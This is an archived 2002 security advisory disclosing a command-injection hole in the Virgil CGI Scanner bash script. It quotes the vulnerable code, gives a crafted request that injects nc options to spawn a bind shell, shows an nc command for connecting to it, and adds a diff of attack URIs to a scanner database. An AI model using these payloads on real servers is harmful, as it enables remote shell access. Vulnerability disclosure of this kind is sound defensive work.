Virgil CGI Scanner Vulnerability

From: kalifat_private
Date: Tue Oct 22 2002 - 11:54:12 PDT

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    - - --------------------------------------------------------------------------
    KALIF research group                                    kalifat_private
    October 21st, 2002                                         Joschka Fischer
    - - --------------------------------------------------------------------------
    - - Overview
      Software      : Virgil CGI Scanner 0.9
      Programmer    : Marc Ruef <marc.ruefat_private>
      Vulnerability : Privilege Escalation
      Status        : Author has been notified
      Type          : remote
    - - Issue
       Joschka Fischer discovered a security hole in the CGI vulnerability scanner
      'Virgil' by Mark Ruef [1] ! By sending a special crafted request one is able
      to spawn a remote shell with the privileges of the running CGI script.
        Depending on the used software this is either the owner of the script (suExec)
      or the user under which the HTTP daemon is executed (usually nobody).
    - - Problem Description
       Virgil CGI Scanner by Mark Ruef is a simple Bash Script which offers an
      interface to start CGI security audits against foreign hosts. The author states
      that his software represents the first free online-based CGI scanner and uses a
      very effective and fast technique to determine vulnerabilities.
       Mark Ruef - a self-proclaimed security expert - recently received fame by posting
      different announcements to well-known security mailinglists and by writing a
      german book called "Hacking Intern" which deals with common security techniques and
      has been released by a german gossip publisher house [2].
      To get the Virgil CGI Scanner look at:
       MD5SUM: fe098b68c0de04cb0200f2db324ab10b
      For a running version visit:
    - - Technical Description
      The following vulnerability is present in Virgil CGI Scanner v. 0.9!
       BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`
      Here, both variables are user-supplied:
       TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`
       ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`
      Nevertheless there exist a few restrictions, namly:
       - The $QUERY_STRING was not parsed, i.e. %20 for example was not replaced with ' '
       - In $ZIELPORT the dash ('-') is filtered out
      To test whether the script is vulnerable use the following request and telnet to
      the given port number (i.e. 31337):
      Exploitation is very straight forwared as long as nc supports the -e command:
       '/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port for
      exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v TARGET.COM 1030-6000`
      while constantly requesting the URI mentioned above.
    - - Workaround / Patch
       We are currently not aware of any patches, but we suggest you to update your Virgil
      Vulnerable CGI-Script Database accordingly.
      *** apache.db.old	Sun Oct 23 23:05:05 1983
      --- apache.db   	Sun Oct 23 23:05:05 1985
      *** 1,3 ****
      --- 1,5 ----
      + cgi-bin/virgil.cgi?tar=-lp&zielport=31337
      + cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
    - - References / Greets
      Pengo for elite VMS security
      Nung at the CCC-Congress, next time i will ask for coffee.
    Version: Hush 2.2 (Java)
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